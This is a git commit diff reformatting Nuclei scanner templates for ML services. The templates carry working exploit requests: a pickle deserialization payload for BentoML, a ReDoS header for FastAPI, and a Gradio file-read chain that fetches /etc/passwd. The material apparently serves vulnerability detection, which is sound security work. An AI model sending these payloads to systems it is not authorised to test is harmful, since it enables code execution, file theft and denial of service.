feat: change some templates structure to make it readable and fix fastapi-dos template

bentoml/bentoml-rce.yaml

@@ -13,7 +13,7 @@ info:
     cwe-id: CWE-1188 # Insecure Default Initialization of Resource
   tags: bentoml, rce, deserialization, protectai, huntr, ai, machine-learning
 
-requests:
+http:
   - method: POST
     path:
       - "{{BaseURL}}/summarize"
@@ -21,6 +21,7 @@ requests:
       Content-Type: "application/vnd.bentoml+pickle"
     body: !!binary |
       gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4=
+
     matchers-condition: and
     matchers:
       - type: word

fastapi/fastapi_dos.yaml

@@ -1,7 +1,7 @@
 id: fastapi-redos
 info:
   name: Check FastAPI ReDoS Vulnerability in Form Data Parsing
-  author: DanMcInerney, byt3bl33d3r, nicecatch2000
+  author: DanMcInerney, byt3bl33d3r, nicecatch2000, daffainfo
   severity: high
   description: Checks for ReDoS vulnerability in FastAPI when parsing form data with a malicious Content-Type header.
   reference:
@@ -11,13 +11,18 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
     cwe-id: CWE-400  # Resource Exhaustion
   tags: fastapi, redos, dos, vulnerability, ai, ml, protectai, huntr
-requests:
+
-  - method: POST
+http:
-    path:
+  - raw:
-      - "{{BaseURL}}/submit/"
+      - |+
-    headers:
+        POST /submit/ HTTP/1.1
-      Content-Type: "application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'"
+        Host: {{Hostname}}
-    body: "input=1"
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded; !="\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
+        Content-Length: 7
+
+        input=1
+    unsafe: true
     matchers-condition: and
     matchers:
       - type: status
@@ -25,5 +30,7 @@ requests:
           - 500
           - 502
           - 504
-      - type: time
+
-        time: 5000  # Milliseconds, you may adjust this threshold based on expected response times
+      - type: dsl
+        dsl:
+          - 'duration>=5'

gradio/gradio-lfi.yaml

@@ -1,7 +1,7 @@
 id: gradio-local-file-include
 info:
   name: Gradio Local File Read Vulnerability
-  author: ozelis, DanMcInerney
+  author: ozelis, DanMcInerney, daffainfo
   severity: high
   description: This nuclei template checks for Local File Read vulnerability in Gradio applications.
   reference:
@@ -13,7 +13,9 @@ info:
     cve-id: CVE-2024-1561
   tags: gradio, lfi, local-file-include, python, api, ai, machine-learning, huntr
 
-requests:
+flow: http(1) && http(2) && http(3)
+
+http:
   - method: GET
     path:
       - "{{BaseURL}}/config"
@@ -26,20 +28,18 @@ requests:
         json:
           - ".components[0].id"
 
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/component_server"
+        POST /component_server HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
 
-    headers:
+        {
-      Content-Type: application/json
+          "component_id": "{{component_id}}",
-
+          "data": "/etc/passwd",
-    body: |
+          "fn_name": "move_resource_to_block_cache",
-      {
+          "session_hash": "aaaaaaaaaaa"
-        "component_id": "{{component_id}}",
+        }
-        "data": "/etc/passwd",
-        "fn_name": "move_resource_to_block_cache",
-        "session_hash": "aaaaaaaaaaa"
-      }
 
     extractors:
       - type: regex
@@ -48,16 +48,16 @@ requests:
         internal: true
         group: 1
         regex: 
-          - "\"(.+)\"" 
+          - '"(.+)"' 
 
   - method: GET
     path:
       - "{{BaseURL}}/file={{extracted_content}}"
-    
-    matchers-condition: and
 
+    matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
 

ray/nuclei-templates/ray-static-lfi.yaml

@@ -13,7 +13,6 @@ info:
     cwe-id: CWE-29
   tags: ray,ml,cve,huntr,protectai
 
-
 http:
   - method: GET
     path: